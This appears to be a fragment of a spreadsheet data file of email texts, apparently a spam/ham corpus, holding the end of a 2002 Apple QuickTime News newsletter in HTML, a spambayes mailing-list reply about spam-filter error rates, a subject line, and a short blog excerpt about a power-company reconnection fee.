 				&lt;a href="http://www.apple.com/trailers/wb/matrix_reloaded.html"&gt;&lt;img src="http://a772.g.akamai.net/7/772/51/f12e1402a6f4b5/www.apple.com/enews/2002/07/images/matrix2.jpg" alt="" width="160" height="132" border="0"&gt;&lt;/a&gt;
 				&lt;/td&gt;
 			&lt;/tr&gt;
 		&lt;/table&gt;
 		&lt;br&gt;
 		&lt;table border="0" cellpadding="0" cellspacing="0" width="598"&gt;
 			&lt;tr&gt;
 				&lt;td bgcolor="#e5e5e5" colspan="3"&gt;&lt;img src="http://a772.g.akamai.net/7/772/51/358f94896524e7/www.apple.com/enews/2002/05/images/greypixel.gif" alt="" width="598" height="1" border="0"&gt;&lt;/td&gt;
 			&lt;/tr&gt;
 			&lt;tr&gt;
 				&lt;td bgcolor="#ffffff" valign="top" width="377"&gt;
 				&lt;img src="http://a772.g.akamai.net/7/772/51/84485f130fd0fe/www.apple.com/enews/eimages/spacer.gif" alt="" width="377" height="1" border="0"&gt;
 				&lt;!-- Article 1 --&gt;&lt;a name="article1"&gt;&lt;/a&gt;
 				&lt;table border="0" cellpadding="8" cellspacing="0"&gt;
 					&lt;tr&gt;
 						&lt;td&gt;&lt;font size=2 face="Lucida Grande,Geneva,Arial,Helvetica,sans-serif" class="L12"&gt;
 						&lt;a href="#top"&gt;&lt;img src="http://a772.g.akamai.net/7/772/51/05d9778050e4e9/www.apple.com/enews/2002/07/images/26qh1.gif" alt="" width="344" height="27" border="0"&gt;&lt;/a&gt;&lt;br&gt;
 						&lt;a href="http://www.apple.com/hotnews/articles/2002/07/mwny/"&gt;&lt;img src="http://a772.g.akamai.net/7/772/51/78c70455db9bfe/www.apple.com/enews/2002/07/images/nycab.jpg" alt="" width="155" height="121" border="0" align="left"&gt;&lt;/a&gt;
 						On July 17, tens of thousands packed New York City&amp;#146;s Jacob K. Javitz
 						Center&amp;#151;and more than 50,000 tuned in online &amp;#151; to watch Apple CEO
 						Steve Jobs unveil exciting new Apple products and technologies at
 						Macworld.
 						&lt;br&gt;&lt;br&gt;
 						Miss the keynote? Not to worry, we already have an &lt;a href="http://www.apple.com/quicktime/qtv/mwny02/"&gt;MPEG-4 stream&lt;/a&gt;
 						available on our website.
 						&lt;br&gt;&lt;br&gt;
 						What can you expect to see?
 						&lt;br&gt;&lt;br&gt;
 						Watch Jobs highlight the amazing new features&amp;#151;there are over
 						150 of them&amp;#151;in Jaguar, Mac OS X v10.2, due to ship in late August.
 						Learn about the new benefits of Apple&amp;#146;s online .Mac service. And
 						check out the new 17-inch widescreen iMac, as well as the newest
 						iPod models&amp;#151;including iPod for Windows.
 						&lt;/font&gt;
 						&lt;/td&gt;
 					&lt;/tr&gt;
 				&lt;/table&gt;
 				&lt;img src="http://a772.g.akamai.net/7/772/51/358f94896524e7/www.apple.com/enews/2002/05/images/greypixel.gif" alt="" width="377" height="1" border="0"&gt;
 				&lt;!-- Article 2 --&gt;&lt;a name="article2"&gt;&lt;/a&gt;
 				&lt;table border="0" cellpadding="8" cellspacing="0"&gt;
 					&lt;tr&gt;
 						&lt;td&gt;&lt;font size=2 face="Lucida Grande,Geneva,Arial,Helvetica,sans-serif" class="L12"&gt;
 						&lt;a href="#top"&gt;&lt;img src="http://a772.g.akamai.net/7/772/51/de19f93c7c8fd5/www.apple.com/enews/2002/07/images/26qh2.gif" alt="" width="344" height="27" border="0"&gt;&lt;/a&gt;&lt;br&gt;
 						&lt;a href="http://www.apple.com/quicktime/products/qt/"&gt;&lt;img src="http://a772.g.akamai.net/7/772/51/b34cb1cb78c08a/www.apple.com/enews/2002/07/images/QTlogo.gif" alt="" width="100" height="82" border="0" align="left"&gt;&lt;/a&gt;
 						QuickTime 6 is now available for &lt;a href="http://www.apple.com/quicktime/download/"&gt;download&lt;/a&gt;.
 						&lt;br&gt;&lt;br&gt;
 						Incorporating MPEG-4 and its next-generation digital media
 						technology, QuickTime 6 delivers an unparalleled multimedia
 						experience. It features:
 						&lt;br clear="all"&gt;&lt;br&gt;
 						&lt;table border="0" cellpadding="0" cellspacing="0"&gt;
 							&lt;tr&gt;
 								&lt;td valign="top"&gt;&lt;font size=2 face="Lucida Grande,Geneva,Arial,Helvetica,sans-serif" class="L12"&gt;&amp;#149;&amp;nbsp;&amp;nbsp; &lt;/font&gt;&lt;/td&gt;
 								&lt;td valign="top"&gt;&lt;font size=2 face="Lucida Grande,Geneva,Arial,Helvetica,sans-serif" class="L12"&gt;Instant-On streaming. No more waiting through buffer delays.
 						Instant-On gives you instant access to whatever section of a movie
 						you want to jump to.&lt;/font&gt;&lt;/td&gt;
 							&lt;/tr&gt;
 							&lt;tr&gt;
 								&lt;td valign="top"&gt;&lt;font size=2 face="Lucida Grande,Geneva,Arial,Helvetica,sans-serif" class="L12"&gt;&amp;#149;&amp;nbsp;&amp;nbsp; &lt;/font&gt;&lt;/td&gt;
 								&lt;td valign="top"&gt;&lt;font size=2 face="Lucida Grande,Geneva,Arial,Helvetica,sans-serif" class="L12"&gt;Advanced Audio Coding (AAC). The new standard in professional audio,
 						AAC provides more efficient compression than ever yet delivers
 						sound quality rivaling that of uncompressed CD audio.&lt;/font&gt;&lt;/td&gt;
 							&lt;/tr&gt;
 							&lt;tr&gt;
 								&lt;td valign="top"&gt;&lt;font size=2 face="Lucida Grande,Geneva,Arial,Helvetica,sans-serif" class="L12"&gt;&amp;#149;&amp;nbsp;&amp;nbsp; &lt;/font&gt;&lt;/td&gt;
 								&lt;td valign="top"&gt;&lt;font size=2 face="Lucida Grande,Geneva,Arial,Helvetica,sans-serif" class="L12"&gt;An updated user interface. Accessing QuickTime content is now easier
 						than ever. We&amp;#146;ve also added a new Favorites menu, so you can bookmark
 						you favorite QuickTime movies.&lt;/font&gt;&lt;/td&gt;
 							&lt;/tr&gt;
 						&lt;/table&gt;
 						&lt;br&gt;
 						And that&amp;#146;s just the &lt;a href="http://www.apple.com/quicktime/products/qt/"&gt;beginning&lt;/a&gt; of the great QuickTime 6 story.
 						&lt;/font&gt;
 						&lt;/td&gt;
 					&lt;/tr&gt;
 				&lt;/table&gt;
 				&lt;img src="http://a772.g.akamai.net/7/772/51/358f94896524e7/www.apple.com/enews/2002/05/images/greypixel.gif" alt="" width="377" height="1" border="0"&gt;
 				&lt;!-- Article 3 --&gt;&lt;a name="article3"&gt;&lt;/a&gt;
 				&lt;table border="0" cellpadding="8" cellspacing="0"&gt;
 					&lt;tr&gt;
 						&lt;td&gt;&lt;font size=2 face="Lucida Grande,Geneva,Arial,Helvetica,sans-serif" class="L12"&gt;
 						&lt;a href="#top"&gt;&lt;img src="http://a772.g.akamai.net/7/772/51/fa075b8742884b/www.apple.com/enews/2002/07/images/26qh3.gif" alt="" width="344" height="27" border="0"&gt;&lt;/a&gt;&lt;br&gt;
 						&lt;a href="http://www.apple.com/ipod/"&gt;&lt;img src="http://a772.g.akamai.net/7/772/51/c69266217d00c8/www.apple.com/enews/2002/07/images/ipodwin.jpg" alt="" width="155" height="165" border="0" align="left"&gt;&lt;/a&gt;
 						We know that QuickTime News readers love music. And soon, more of
 						you will be able to take your favorite tunes with you wherever you
 						go. That&amp;#146;s because iPod, Apple&amp;#146;s incredibly popular MP3 player, is
 						now available for both Mac and Windows users.
 						&lt;br&gt;&lt;br&gt;
 						&lt;a href="http://www.apple.com/ipod"&gt;iPod for Windows&lt;/a&gt; comes with the leading jukebox software for
 						PCs&amp;#151;MUSICMATCH Jukebox Plus. So you can easily manage your digital
 						music library. Quickly transfer your music collection&amp;#151;and
 						playlists&amp;#151;to iPod via FireWire. Automatically sync with iPod when
 						your music library changes. And use it to convert your music CDs,
 						tapes and vinyl to MP3s.
 						&lt;br&gt;&lt;br&gt;
 						iPod for Windows ships in August, but you can order yours today from
 						the Apple Store. 
 						&lt;/font&gt;
 						&lt;/td&gt;
 					&lt;/tr&gt;
 				&lt;/table&gt;
 				&lt;img src="http://a772.g.akamai.net/7/772/51/358f94896524e7/www.apple.com/enews/2002/05/images/greypixel.gif" alt="" width="377" height="1" border="0"&gt;
 				&lt;!-- Article 4 --&gt;&lt;a name="article4"&gt;&lt;/a&gt;
 				&lt;table border="0" cellpadding="8" cellspacing="0"&gt;
 					&lt;tr&gt;
 						&lt;td&gt;&lt;font size=2 face="Lucida Grande,Geneva,Arial,Helvetica,sans-serif" class="L12"&gt;
 						&lt;a href="#top"&gt;&lt;img src="http://a772.g.akamai.net/7/772/51/eb4a44cf4859cc/www.apple.com/enews/2002/07/images/26qh4.gif" alt="" width="344" height="28" border="0"&gt;&lt;/a&gt;&lt;br&gt;&lt;br&gt;
 						&lt;a href="http://www.apple.com/quicktime/whatson/"&gt;&lt;img src="http://a772.g.akamai.net/7/772/51/ded24b6aeecb8f/www.apple.com/enews/2002/07/images/ozzy.jpg" alt="" width="130" height="113" border="0" align="left"&gt;&lt;/a&gt;
 						Like to find great QuickTime content all in one place? Visit our new
 						streamlined website. You&amp;#146;ll now find links to a vast assortment of
 						QuickTime video and audio consolidated onto our new &lt;a href="http://www.apple.com/quicktime/whatson/"&gt;What&amp;#146;s On&lt;/a&gt; page.
 						&lt;br&gt;&lt;br&gt;
 						Tune in, for example, to Ozzy Osbourne. Enjoying new-found celebrity
 						thanks to his hit cable series, Ozzy performs &amp;#147;Junkie&amp;#148; live at Budokan on Epic 
 						Records&amp;#146; New Music Mondays.
 						&lt;br&gt;&lt;br&gt;
 						Or explore the surreal world of realMyst. MacPlay&amp;#146;s 3D version of
 						the classic game Myst takes you on a dreamlike journey of mystical
 						adventure. Is it really just a game?
 						&lt;br&gt;&lt;br&gt;
 						Jump back into reality by visiting VRway. Over 3000 QuickTime VRs
 						take you to some of the most beautiful sites of Europe.
 						&lt;/font&gt;
 						&lt;/td&gt;
 					&lt;/tr&gt;
 				&lt;/table&gt;
 				&lt;img src="http://a772.g.akamai.net/7/772/51/358f94896524e7/www.apple.com/enews/2002/05/images/greypixel.gif" alt="" width="377" height="1" border="0"&gt;
 				&lt;!-- Article 4b --&gt;&lt;a name="article4"&gt;&lt;/a&gt;
 				&lt;table border="0" cellpadding="8" cellspacing="0"&gt;
 					&lt;tr&gt;
 						&lt;td&gt;&lt;font size=2 face="Lucida Grande,Geneva,Arial,Helvetica,sans-serif" class="L12"&gt;
 						&lt;a href="#top"&gt;&lt;img src="http://a772.g.akamai.net/7/772/51/74d5945dcc6372/www.apple.com/enews/2002/05/images/03qh4.gif" alt="" width="344" height="27" border="0"&gt;&lt;/a&gt;&lt;br&gt;
 						&lt;a href="http://www.apple.com/quicktime/upgrade/"&gt;&lt;img src="http://a772.g.akamai.net/7/772/51/5d9f53de4124f7/www.apple.com/enews/2002/07/images/qtpro.jpg" alt="" width="140" height="125" border="0" align="left"&gt;&lt;/a&gt;
 						Eager to author content in the new international standard format for
 						the Internet&amp;#151;MPEG-4? Now you can do so easily by upgrading to
 						QuickTime 6 Pro.
 						&lt;br&gt;&lt;br&gt;
 						With QuickTime 6 Pro, not only can you harness the power of MPEG-4,
 						but you can play movies in full screen, edit movies by simply
 						cutting and pasting, prepare movies for streaming.
 						&lt;br&gt;&lt;br&gt;
 						Learn more about &lt;a href="http://www.apple.com/quicktime/upgrade/"&gt;QuickTime 6 Pro&lt;/a&gt; on our website.
 						&lt;p align="center"&gt;
 						&lt;img src="http://a772.g.akamai.net/7/772/51/82815b4b56f654/www.apple.com/enews/eimages/separator.jpg" alt="" width="33" height="12" border="0" align="middle"&gt;				
 						&lt;/p&gt;
 						For those of you who want the ability to preview MPEG-2 content, we
 						now offer the &lt;a href="http://www.apple.com/quicktime/products/mpeg2playback/"&gt;QuickTime 6 MPEG-2 Playback Component&lt;/a&gt;, available for
 						purchase at the online Apple Store.
 						&lt;br&gt;&lt;br&gt;
 						By adding this component to QuickTime 6, you have the perfect tool
 						for previewing and sharing your work with your clients throughout
 						the production process.
 						&lt;/font&gt;
 						&lt;/td&gt;
 					&lt;/tr&gt;
 				&lt;/table&gt;
 				&lt;img src="http://a772.g.akamai.net/7/772/51/358f94896524e7/www.apple.com/enews/2002/05/images/greypixel.gif" alt="" width="377" height="1" border="0"&gt;
 				&lt;!-- Article 5 --&gt;&lt;a name="article5"&gt;&lt;/a&gt;
 				&lt;table border="0" cellpadding="8" cellspacing="0"&gt;
 					&lt;tr&gt;
 						&lt;td&gt;&lt;font size=2 face="Lucida Grande,Geneva,Arial,Helvetica,sans-serif" class="L12"&gt;
 						&lt;a href="#top"&gt;&lt;img src="http://a772.g.akamai.net/7/772/51/b1ef1322d15e1c/www.apple.com/enews/2002/05/images/31qh6.gif" alt="" width="204" height="27" border="0"&gt;&lt;/a&gt;&lt;br&gt;
 						&lt;a href="http://www.apple.com/trailers/touchstone/signs/"&gt;&lt;img src="http://a772.g.akamai.net/7/772/51/fe5a07ea09f1a8/www.apple.com/enews/2002/07/images/signs.jpg" alt="" width="105" height="150" border="0" align="right"&gt;&lt;/a&gt;
 						In rural Pennsylvania, pastor Graham Hess and his family are
 						terrified when mysterious giant crop circles appear in their
 						cornfield&amp;#151;as well as around the world. Is it a sign from alien
 						beings? Or something else?
 						&lt;br&gt;&lt;br&gt;
 						Starring Mel Gibson and directed by M. Night Shyamalan (&amp;#147;The Sixth
 						Sense&amp;#148;), &amp;#147;&lt;a href="http://www.apple.com/trailers/touchstone/signs/"&gt;Signs&lt;/a&gt;&amp;#148; opens in U.S. theaters on August 2.
 						&lt;br&gt;&lt;br&gt;
 						Some believe that supernatural forces create crop circles, while
 						others remain skeptical. To help you decide, Touchstone Pictures
 						presents images of actual circles, as well as interviews with
 						witnesses and experts. Click on &amp;#147;&lt;a href="http://bventertainment.go.com/movies/signs/"&gt;Is it a Sign?&lt;/a&gt;&amp;#148; to find out more.
 						&lt;/font&gt;
 						&lt;/td&gt;
 					&lt;/tr&gt;
 				&lt;/table&gt;
 				&lt;img src="http://a772.g.akamai.net/7/772/51/358f94896524e7/www.apple.com/enews/2002/05/images/greypixel.gif" alt="" width="377" height="1" border="0"&gt;
 				&lt;table border="0" cellpadding="8" cellspacing="0" width="100%"&gt;
 					&lt;tr&gt;
 						&lt;td align="center"&gt;&lt;font size=2 face="Lucida Grande,Geneva,Arial,Helvetica,sans-serif" class="L12"&gt;
 						We hope you enjoyed reading this issue of QuickTime News.&lt;br&gt;
 						We&amp;#146;ll send your next issue on August 9.&lt;br&gt;
 						&lt;/font&gt;
 						&lt;/td&gt;
 					&lt;/tr&gt;
 				&lt;/table&gt;
 				&lt;/td&gt;
 				&lt;td bgcolor="#e5e5e5" width="1"&gt;&lt;img src="http://a772.g.akamai.net/7/772/51/358f94896524e7/www.apple.com/enews/2002/05/images/greypixel.gif" alt="" width="1" height="1" border="0"&gt;&lt;/td&gt;
 				&lt;td bgcolor="#ffffff" valign="top" width="220"&gt;
 				&lt;img src="http://a772.g.akamai.net/7/772/51/84485f130fd0fe/www.apple.com/enews/eimages/spacer.gif" alt="" width="220" height="1" border="0"&gt;&lt;br&gt;
 				&lt;!-- Article 5 --&gt;&lt;a name="article1"&gt;&lt;/a&gt;
 				&lt;table border="0" cellpadding="8" cellspacing="0"&gt;
 					&lt;tr&gt;
 						&lt;td&gt;&lt;font size=2 face="Lucida Grande,Geneva,Arial,Helvetica,sans-serif" class="L12"&gt;
 						&lt;a href="#top"&gt;&lt;img src="http://a772.g.akamai.net/7/772/51/6f9427aa8f03c0/www.apple.com/enews/2002/05/images/03qh5.gif" alt="" width="204" height="27" border="0"&gt;&lt;/a&gt;&lt;br&gt;
 						&lt;a href="http://getmusic.com/microsites/michaelbolton/"&gt;&lt;img src="http://a772.g.akamai.net/7/772/51/3d1a049d1ddfe2/www.apple.com/enews/2002/07/images/MBoltonCD.jpg" alt="" width="100" height="100" border="0" align="left"&gt;&lt;/a&gt;
 						After four years out of the spotlight, singer/songwriter Michael
 						Bolton returns with a new album, &amp;#147;&lt;a href="http://www.michaelboltonmusic.com"&gt;Only a Woman Like You&lt;/a&gt;.&amp;#148; Watch the
 						video for the first single (which bears the same name as the album),
 						co-written by Bolton, country sensation Shania Twain, and her
 						husband, record producer Mutt Lang.
 						&lt;p align="center"&gt;
 						&lt;img src="http://a772.g.akamai.net/7/772/51/82815b4b56f654/www.apple.com/enews/eimages/separator.jpg" alt="" width="33" height="12" border="0" align="middle"&gt;				
 						&lt;/p&gt;
 						&lt;a href="http://www.bethorton.mu"&gt;&lt;img src="http://a772.g.akamai.net/7/772/51/6e4cdf6a36f414/www.apple.com/enews/2002/07/images/bethorton.jpg" alt="" border="0" align="right"&gt;&lt;/a&gt;
 						Beth Orton&amp;#151;the British singer/songwriter whose eagerly awaited third album arrives 
 						on US store shelves next week&amp;#151;invited a few vocal friends to join her on &amp;#147;&lt;a href="http://www.bethorton.mu"&gt;Daybreaker&lt;/a&gt;.&amp;#148;
 						Like Emmylou Harris (who chimes in on &amp;#147;God Song&amp;#148;), the Chemical Brothers, Ben Watt, Johnny Marr and William Orbit.
 						&lt;br&gt;&lt;br&gt;
 						Visit Orton&amp;#146;s site and watch the music &lt;i&gt;video&lt;/i&gt; for &amp;#147;Concrete Sky&amp;#148; and hear 
 						three &lt;i&gt;audio&lt;/i&gt; tracks from the album: &amp;#147;Carmella,&amp;#148; &amp;#147;Daybreaker,&amp;#148; and &amp;#147;Thinking 
 						About Tomorrow.&amp;#148;
 						&lt;p align="center"&gt;
 						&lt;img src="http://a772.g.akamai.net/7/772/51/82815b4b56f654/www.apple.com/enews/eimages/separator.jpg" alt="" width="33" height="12" border="0" align="middle"&gt;				
 						&lt;/p&gt;
 						What&amp;#146;s new on Columbia&amp;#146;s Midweek Music?
 						&lt;br&gt;&lt;br&gt;
 						&lt;a href="http://columbiarecords.com/midweekmusic/"&gt;&lt;img src="http://a772.g.akamai.net/7/772/51/d27baaa466600d/www.apple.com/enews/2002/07/images/aerials.jpg" alt="" width="100" height="86" border="0" align="right"&gt;&lt;/a&gt;
 						One of the headlining bands at this year&amp;#146;s Ozzfest, L.A.&amp;#146;s
 						multicultural metal men System of a Down perform &amp;#147;&lt;a href="http://columbiarecords.com/midweekmusic/"&gt;Aerials&lt;/a&gt;,&amp;#148; the
 						latest from their 2001 album &amp;#147;Toxicity.&amp;#148; Watch the video through
 						July 31.
 						&lt;br&gt;&lt;br&gt;
 						And from &lt;i&gt;July 31 to August 7&lt;/i&gt;, check out &amp;#147;&lt;a href="http://columbiarecords.com/midweekmusic/"&gt;Girls of Summer&lt;/a&gt;,&amp;#148; the
 						video for one of two new tracks included on the classic compilation,
 						&amp;#147;O Yeah! Ultimate Aerosmith Hits.&amp;#148;
 						&lt;p align="center"&gt;
 						&lt;img src="http://a772.g.akamai.net/7/772/51/82815b4b56f654/www.apple.com/enews/eimages/separator.jpg" alt="" width="33" height="12" border="0" align="middle"&gt;				
 						&lt;/p&gt;
 						&amp;#147;They&amp;#146;re personal/political odes with the bite of twenty
 						rottweilers. Passionate songs full of fear and loathing, but with a
 						pop rush.&amp;#148; So says the REM-inspired, London band Wilt about their
 						new album, &amp;#147;My Medicine.&amp;#148;
 						&lt;br&gt;&lt;br&gt;
 						Ready for a dose? Then tune in to hear &lt;a href="http://www.w-mm.co.uk"&gt;eleven complete tracks&lt;/a&gt;.
 						&lt;p align="center"&gt;
 						&lt;img src="http://a772.g.akamai.net/7/772/51/82815b4b56f654/www.apple.com/enews/eimages/separator.jpg" alt="" width="33" height="12" border="0" align="middle"&gt;				
 						&lt;/p&gt;
 						&lt;a href="http://www.rhino.com/fun/listeningparties/78184_PartyPlayer.mgi2?P=RHIQT"&gt;&lt;img src="http://a772.g.akamai.net/7/772/51/59514d2e33f301/www.apple.com/enews/2002/07/images/RandyTravis.jpg" alt="" width="100" height="90" border="0" align="left"&gt;&lt;/a&gt;
 						In 1986, with his debut album &amp;#147;Storms of Life,&amp;#148; Randy Travis became
 						the first country music artist to go multi-platinum. &amp;#147;Trail of
 						Memories: The Randy Travis Anthology&amp;#148; brings together over 40 of the
 						legendary star&amp;#146;s hits from 1986 to 1999, including duets with George
 						Jones, B.B. King, Tammy Wynette, and Merle Haggard. Join the &lt;a href="http://www.rhino.com/fun/listeningparties/78184_PartyPlayer.mgi2?P=RHIQT"&gt;Randy
 						Travis Listening Party&lt;/a&gt; and enjoy Disc One of this 2-disc collection.
 						&lt;p align="center"&gt;
 						&lt;img src="http://a772.g.akamai.net/7/772/51/82815b4b56f654/www.apple.com/enews/eimages/separator.jpg" alt="" width="33" height="12" border="0" align="middle"&gt;				
 						&lt;/p&gt;
 						The music of alternative rock band &lt;a href="http://www.swither.com/"&gt;Swither&lt;/a&gt; evokes both the opacity
 						and richness of human emotions. Watch the MPEG-4 videos of &amp;#147;Here and
 						Now&amp;#148; and &amp;#147;Pri-Mer.&amp;#148;
 						&lt;/font&gt;
 						&lt;/td&gt;
 					&lt;/tr&gt;
 				&lt;/table&gt;
 				&lt;img src="http://a772.g.akamai.net/7/772/51/358f94896524e7/www.apple.com/enews/2002/05/images/greypixel.gif" alt="" width="220" height="1" border="0"&gt;
 				&lt;!-- Article 7 --&gt;&lt;a name="article7"&gt;&lt;/a&gt;
 				&lt;table border="0" cellpadding="8" cellspacing="0"&gt;
 					&lt;tr&gt;
 						&lt;td&gt;&lt;font size=2 face="Lucida Grande,Geneva,Arial,Helvetica,sans-serif" class="L12"&gt;
 						&lt;a href="#top"&gt;&lt;img src="http://a772.g.akamai.net/7/772/51/39bcd94d38b883/www.apple.com/enews/2002/05/images/02ih8.gif" alt="" width="204" height="27" border="0"&gt;&lt;/a&gt;&lt;br&gt;
 						&amp;#147;So much music, it makes me feel powerful.&amp;#148; That&amp;#146;s &lt;a href="http://www.apple.com/hotnews/articles/2002/07/mwny/hamiltonmorris.html"&gt;Hamilton Morris&lt;/a&gt;
 						talking about his iPod in one of the new ads featured in last
 						week&amp;#146;s Macworld New York expo. Catch the QuickTime movie.
 						&lt;p align="center"&gt;
 						&lt;img src="http://a772.g.akamai.net/7/772/51/82815b4b56f654/www.apple.com/enews/eimages/separator.jpg" alt="" width="33" height="12" border="0" align="middle"&gt;				
 						&lt;/p&gt;
 						&lt;img src="http://a772.g.akamai.net/7/772/51/3dfa419404e68b/www.apple.com/enews/2002/07/images/tiefly.jpg" alt="" width="100" height="76" border="0" align="right"&gt;
 						How good are your fly-tying techniques? Watch these tutorials from
 						about.com and learn how fly fishermen tie one on the right way.
 						First up, watch &lt;a href="http://flyfishing.about.com/library/ffm/ftb/aajbwhipfinish.htm"&gt;QuickTime video seminars&lt;/a&gt; illustrating how to tie the
 						Double Hitch and Hand Whip-Finish and how to use a Matarelli
 						Whip-finish Tool.
 						&lt;br&gt;&lt;br&gt;
 						Then, in &lt;a href="http://flyfishing.miningco.com/library/ffm/skills/aajbknotvideos.htm"&gt;another video seminar&lt;/a&gt;, find out how to tie the Improved
 						Clinch Knot, Non-Slip Loop, George Harvey Dry-Fly Knot, and
 						Nail-less Nail Knot.
 						&lt;p align="center"&gt;
 						&lt;img src="http://a772.g.akamai.net/7/772/51/82815b4b56f654/www.apple.com/enews/eimages/separator.jpg" alt="" width="33" height="12" border="0" align="middle"&gt;				
 						&lt;/p&gt;
 						If you&amp;#146;re dying to know what the dead relatives of famous people are
 						thinking, investigate the celebrity readings on psychic John
 						Edward&amp;#146;s &lt;a href="http://www.scifi.com/johnedward/celebrity/"&gt;Crossing Over&lt;/a&gt; website.
 						&lt;/font&gt;
 						&lt;/td&gt;
 					&lt;/tr&gt;
 				&lt;/table&gt;
 				&lt;/td&gt;
 			&lt;/tr&gt;
 			&lt;tr&gt;
 				&lt;td bgcolor="#e5e5e5" colspan="3"&gt;&lt;img src="http://a772.g.akamai.net/7/772/51/358f94896524e7/www.apple.com/enews/2002/05/images/greypixel.gif" alt="" width="598" height="1" border="0"&gt;&lt;/td&gt;
 			&lt;/tr&gt;
 			&lt;tr&gt;
 				&lt;td bgcolor="#ffffff" colspan="3"&gt;
 				&lt;table border="0" cellpadding="8" cellspacing="0"&gt;
 					&lt;tr&gt;
 						&lt;td&gt;&lt;font face="Geneva, Verdana, Arial, Helvetica, sans-serif" size="1" class="G10"&gt;
 						QuickTime News is a free, bi-weekly email publication.&lt;br&gt;&lt;br&gt;
 						Event dates are subject to change. Some products, programs, or promotions are not available outside the U.S. Visit your local 
 						Apple site or call your local authorized Apple reseller for more information. Prices are estimated retail prices and are listed 
 						in U.S. dollars. Product specifications are subject to change.		
 						&lt;/font&gt;&lt;/td&gt;
 					&lt;/tr&gt;
 				&lt;/table&gt;
 				&lt;/td&gt;
 			&lt;/tr&gt;
 			&lt;tr&gt;
 				&lt;td bgcolor="#e5e5e5" colspan="3"&gt;&lt;img src="http://a772.g.akamai.net/7/772/51/358f94896524e7/www.apple.com/enews/2002/05/images/greypixel.gif" alt="" width="598" height="1" border="0"&gt;&lt;/td&gt;
 			&lt;/tr&gt;
 			&lt;tr&gt;
 				&lt;td bgcolor="#ffffff" colspan="3" align="center"&gt;
 				&lt;table border="0" cellpadding="8" cellspacing="0"&gt;
 					&lt;tr&gt;
 						&lt;td align="center"&gt;&lt;font face="Geneva, Verdana, Arial, Helvetica, sans-serif" size="1" class="G10"&gt;
 						&lt;img src="http://a772.g.akamai.net/7/772/51/c219cc85bc9fbf/www.apple.com/enews/eimages/red_apple_logo.gif" width="25" height="30" border="0" alt=""&gt;&lt;br&gt;
 						Copyright&amp;#169;2002 Apple Computer, Inc.&amp;nbsp;&amp;nbsp;&lt;a href="http://www.apple.com/legal/default.html"&gt;All Rights Reserved&lt;/a&gt;&lt;br&gt;
 						&lt;a href="http://www.apple.com/enews/subscribe/"&gt;Subscribe&lt;/a&gt; | &lt;a href="http://www.apple.com/enews/unsubscribe/"&gt;Unsubscribe&lt;/a&gt; | &lt;a href="http://www.apple.com/enews/change/"&gt;Change Settings&lt;/a&gt; | &lt;a href="http://www.apple.com/legal/privacy/"&gt;Privacy Policy&lt;/a&gt;&lt;/font&gt;
 						&lt;/font&gt;&lt;/td&gt;
 					&lt;/tr&gt;
 				&lt;/table&gt;
 				&lt;/td&gt;
 			&lt;/tr&gt;
 		&lt;/table&gt;
 		&lt;/td&gt;		
 		&lt;td bgcolor="#7e7e7e"&gt;&lt;img src="http://a772.g.akamai.net/7/772/51/84485f130fd0fe/www.apple.com/enews/eimages/spacer.gif" alt="" width="1" height="1" border="0"&gt;&lt;/td&gt;
 	&lt;/tr&gt;		
 	&lt;tr&gt;
 		&lt;td colspan="3"&gt;&lt;img src="http://a772.g.akamai.net/7/772/51/aa230f243aeaa0/www.apple.com/enews/2002/05/images/box-bottom.gif" alt="" width="600" height="12" border="0"&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 &lt;/table&gt;
 &lt;/body&gt;
 --This_is_the_boundary_hip_ho--
</t>
  </si>
  <si>
    <t xml:space="preserve">[Neil Schemenauer]
 &gt; Woops.  I didn't have the summary files so I regenerated them using a
 &gt; slightly different set of data.  Here are the results of enabling the
 &gt; "received" header processing:
 &gt;
 &gt;     false positive percentages
 &gt;         0.707  0.530  won    -25.04%
 &gt;         0.873  0.524  won    -39.98%
 &gt;         0.301  0.301  tied
 &gt;         1.047  1.047  tied
 &gt;         0.602  0.452  won    -24.92%
 &gt;         0.353  0.177  won    -49.86%
 &gt;
 &gt;     won   4 times
 &gt;     tied  2 times
 &gt;     lost  0 times
 &gt;
 &gt;     total unique fp went from 17 to 14 won    -17.65%
 &gt;
 &gt;     false negative percentages
 &gt;         2.167  1.238  won    -42.87%
 &gt;         0.969  0.969  tied
 &gt;         1.887  1.372  won    -27.29%
 &gt;         1.616  1.292  won    -20.05%
 &gt;         1.029  0.858  won    -16.62%
 &gt;         1.548  1.548  tied
 &gt;
 &gt;     won   4 times
 &gt;     tied  2 times
 &gt;     lost  0 times
 &gt;
 &gt;     total unique fn went from 50 to 38 won    -24.00%
 &gt;
 &gt; My test set is different than Tim's in that all the email was received
 &gt; by the same account.  Also, my set contains email sent to me, not to
 &gt; mailing lists (I use a different addresses for mailing lists).
 Enabling the Received headers works even better for me &lt;wink&gt;; here's the
 f-n section from a quick run on 500-element subsets:
     0.600  0.200  won    -66.67%
     0.200  0.200  tied
     0.200  0.000  won   -100.00%
     0.800  0.400  won    -50.00%
     0.400  0.200  won    -50.00%
     0.400  0.000  won   -100.00%
     0.200  0.000  won   -100.00%
     1.000  0.400  won    -60.00%
     0.800  0.200  won    -75.00%
     1.200  0.600  won    -50.00%
     0.400  0.200  won    -50.00%
     2.000  0.800  won    -60.00%
     0.400  0.400  tied
     1.200  0.600  won    -50.00%
     0.400  0.000  won   -100.00%
     2.000  1.000  won    -50.00%
     0.400  0.000  won   -100.00%
     0.800  0.000  won   -100.00%
     0.000  0.200  lost  +(was 0)
     0.400  0.000  won   -100.00%
 won  17 times
 tied  2 times
 lost  1 times
 total unique fn went from 38 to 15 won    -60.53%
 A huge improvement, but for wrong reasons ... except not entirely!  The most
 powerful discriminator in the whole database on one training set became:
         'received:unknown' 881 0.99
 That's got nothing to do with BruceG, right?
         'received:bfsmedia.com'
 was also a strong spam indicator across all training sets.  I'm jealous.
 &gt; If people cook up more ideas I will be happy to test them.
 Neil, are using your own tokenizer now, or the tokenizer.Tokenizer.tokenize
 generator?  Whichever, someone who's not afraid of their headers should try
 adding mboxtest.MyTokenizer.tokenize_headers into the mix, once in lieu of
 tokenizer.Tokenizer.tokenize_headers(), and again in addition to it.  Jeremy
 reported on just the former.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: I have the power!
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://jeremy.zawodny.com/blog/archives/000190.html
 Date: 2002-09-25T22:21:15-08:00
 So, I called the power company promptly at 8am to find out what they were 
 smoking. The allowed me to pay by credit card so that I could get reactivated 
 today (and pay a $40 "reconnection fee" for the privilege)....
</t>
